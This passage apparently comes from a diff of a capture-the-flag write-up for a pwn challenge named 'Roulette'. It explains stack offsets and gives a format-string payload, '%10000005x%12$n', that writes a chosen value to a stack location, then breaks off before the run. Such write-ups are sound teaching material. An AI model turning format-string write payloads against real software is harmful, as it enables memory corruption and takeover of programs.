matanr1/CTFs/Matrix2021/Pwn/Roulette/Roulette.md

 07:0038│      0x7fffffffdf18 ◂— 0x0
 ```

-we can see that local 28 is in sixth place -in the format who be in location 12.

-so our buffer should look like:
+We can see that local 28 is in sixth place - in the format attack it will be in location 12. so our buffer should look like:
 `%10000005x%12$n`

 Now let run it: